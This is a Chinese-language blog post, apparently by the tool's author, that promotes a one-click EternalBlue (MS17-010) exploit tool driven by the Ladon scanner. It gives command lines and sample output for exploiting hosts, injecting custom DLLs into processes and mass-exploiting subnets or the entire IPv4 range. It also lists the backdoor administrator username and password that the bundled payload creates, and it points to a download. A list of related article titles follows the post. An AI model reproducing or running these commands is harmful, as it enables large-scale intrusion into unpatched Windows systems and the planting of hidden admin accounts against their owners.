〖EXP〗NSA MS17010永恒之蓝漏洞一键工具
漏洞简介
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
漏洞检测
无损检测,不会对目标造成任何危害,大家无需担心
Ladon 192.168.1.8 MS17010
Ladon 192.168.1.8/24 MS17010
Ladon 192.168.1.8/c MS17010
检测发现存在漏洞高亮显示
独立使用
只需提供IP或IP列表即可自动利用永恒之蓝,当然也可以使用Ladon来批量甚至全网
PS: 由于当时漏洞影响很大,所以并未放出一键批量工具,现在4年过去了,还没打补丁就只能建议开除维护人员了,工具调用的是NSA原版的EXP,所以整个SMBSCAN目录里的文件基本上都是被杀的,这就不方便集成在Ladon里,以免Ladon被所有杀软杀。
C:\Users\k8gege\Desktop\SmbExp>ksmb 192.168.1.89
MS17010-EXP ETERNALBLUE by K8gegeIP: 192.168.1.89
OS: 64-bit 6.1 build 7601 Windows 2008 R2 Enterprise 7601 SP 1
VUL: 3 (ETERNALBLUE - DANE ETERNALROMANCE - FB ETERNALCHAMPION - DANE/F
B)
EXP: Use Eternalblue & Doublepulsar
DLL: x64 Payload Injected
只IP默认445端口
ksmb 192.168.1.89
自定义端口
ksmb 192.168.1.89 445
适用于代理出来打,不用考虑做免杀,而且免杀一堆文件也很麻烦
自定义DLL
ksmb 192.168.1.89 445 mydll.dll
注入指定进程
ksmb 192.168.1.89 445 mydll.dll explorer.exe
Ladon调用
使用Ladon可轻松批量使用自己的POC,即只需要实现一个功能,剩下交给Ladon,不用每次来什么新洞都得浪费时间写批量利用工具。除了花一堆时间调式EXP,还得把它弄成批量,批量又得考虑多线程是否兼容POC里的代码等等问题,等写完时效性都过了。Ladon可批量主机、批量URL、批量网段、全网等等,非常方便,下面就是调用ms17010exp的例子。
C:\Users\k8gege\Desktop\SmbExp>Ladon 192.168.1.89 ksmb.exe
Ladon 7.5
Start: 2020-12-17 23:40:16
Runtime: .net 2.0 ME: x64 OS: x64
OS Name: Microsoft Windows 8.1 Enterprise
RunUser: k8gege PR: -IsUser
PID: 5804 CurrentProcess: LadonCall DiyMoudle (c# exe)
load ksmb.exe
ICMP: 192.168.1.89 00-0C-29-CF-FE-E1 VMware
MS17010-EXP ETERNALBLUE by K8gegeIP: 192.168.1.89
OS: 64-bit 6.1 build 7601 Windows 2008 R2 Enterprise 7601 SP 1
VUL: 3 (ETERNALBLUE - DANE ETERNALROMANCE - FB ETERNALCHAMPION - DANE/F
B)
EXP: Use Eternalblue & Doublepulsar
DLL: x64 Payload Injected
批量利用
Ladon 192.168.1.89/c ksmb.exe
Ladon 192.168.1.89/24 ksmb.exe
全网扫描
Ladon 0.0.0.0-255.255.255.255 ksmb.exe
成功结果
自带DLL会添加以下管理员用户
k8ms17010exp K8gege520!@#
可替换DLL,执行自定义功能
下载
EXP小密圈内下载
〖EXP〗NSA MS17010永恒之蓝漏洞一键工具相关推荐
- MSF之ms17-010永恒之蓝漏洞利用
MSF之ms17-010永恒之蓝漏洞利用 准备 扫描漏洞 漏洞攻击 准备 实验准备环境: 被攻击机:虚拟机win7x64位系统,其IP为:10.101.2.11(关闭了防火墙) 攻击机:虚拟机kali ...
- MS17-010(永恒之蓝)漏洞复现和分析
MS17-010(永恒之蓝)漏洞复现和分析 一.漏洞简介 1.永恒之蓝介绍: 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含&q ...
- 使用ms17-010永恒之蓝漏洞对win7进行渗透
使用ms17-010永恒之蓝漏洞对win7进行渗透 一.实验目的: 利用ms17-010永恒之蓝漏洞对win7进行渗透: 利用enable_rdp脚本开启远程桌面并创建用户: 关闭主机UAC防护策略并 ...
- Windows 7 ms17-010永恒之蓝漏洞复现
Windows 7 ms17-010永恒之蓝漏洞复现 复现ms17-010漏洞环境: VMware Workstation : 攻击机:Kali-Linux : 靶机:Windows 7 : 使用步骤 ...
- Win7利用NSA Eternalblue 永恒之蓝 和fuzzbunch工具实现dll注入 Win 7 64CN
Win7利用NSA Eternalblue 永恒之蓝 和fuzzbunch工具实现dll注入 Win 7 64CN 一.原理 1.Eternalblue可以利用SMB漏洞,结合Doublepulsar ...
- MS17-010永恒之蓝漏洞的简谈与利用
MS17-010是一个安全类型的补丁. MS17-010更新修复了 Microsoft Windows中的漏洞. 如果攻击者向 Microsoft 服务器消息块 1.0 (SMBv1) 服务器发送经特 ...
- 使用ms17-010永恒之蓝漏洞渗透win7系统
实验环境 kali :192.168.249.130 win7 :192.168.249.128 1.永恒之蓝介绍: 永恒之蓝漏洞(MS17-010)通过 TCP 的445和139端口,来利用 SMB ...
- MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位
漏洞复现:MS17-010 漏洞利用的条件:1.靶机开启445端口(如果未打开该端口将会攻击失败,百度打开445端口) 2.关闭防火墙 靶机:windows 7(未知X32位还是X64位) ip:19 ...
- 【网络安全】MS17-010“永恒之蓝”漏洞的利用
导语 最近学期末进行网络安全实训,老师要求每个小组选择一个方向进行研究,本篇将讲述"永恒之蓝"漏洞的简单利用. 一.实验原理 Eternalblue通过TCP端口445和139来利 ...
- msf之ms17-010永恒之蓝漏洞
** 文章主旨: ** 1.熟悉msf的基本用法. 2.熟悉一些渗透中会用到基本的windows命令. 3.复现永恒之蓝漏洞. 漏洞原理: 通过向Windows服务器的SMBv1服务发送精心构造的命令 ...
最新文章
- 从零开始学习tensorflow2.0之熟悉tf2.0的数据
- 使用Eclipse与Pydev开发Python
- vim学习、各类插件配置与安装
- Spring JSF集成
- 详解javascript的bind方法
- SQL入门教程(一):基础知识
- Vue项目url中的BASE_URL解析
- 简单病毒分析及手工查杀
- Ambarella面试小结
- 计算机控制实验报告组态软件学习,中北大学组态软件实验报告
- python分割pdf文档
- 在线职教行业或将迎来下一个千亿市场
- 腾讯企业邮箱满了,如何清空邮箱?
- leofs管理工具之s3 browser连接
- Linux下非交互式sshpass登录
- Unity3D RPG角色扮演游戏源码(上下)-----源代码分析----04--修改菜单窗口
- uiautomator2,一款比appium还好用的app自动化测试框架
- Springboot实现浏览器下载文件
- 罗永浩、360 回应大规模裁员;阿里公布双 11 技术数据;苹果供应商受重挫 | 极客头条...
- 【2019-游记】中山纪念中学暑期游Day2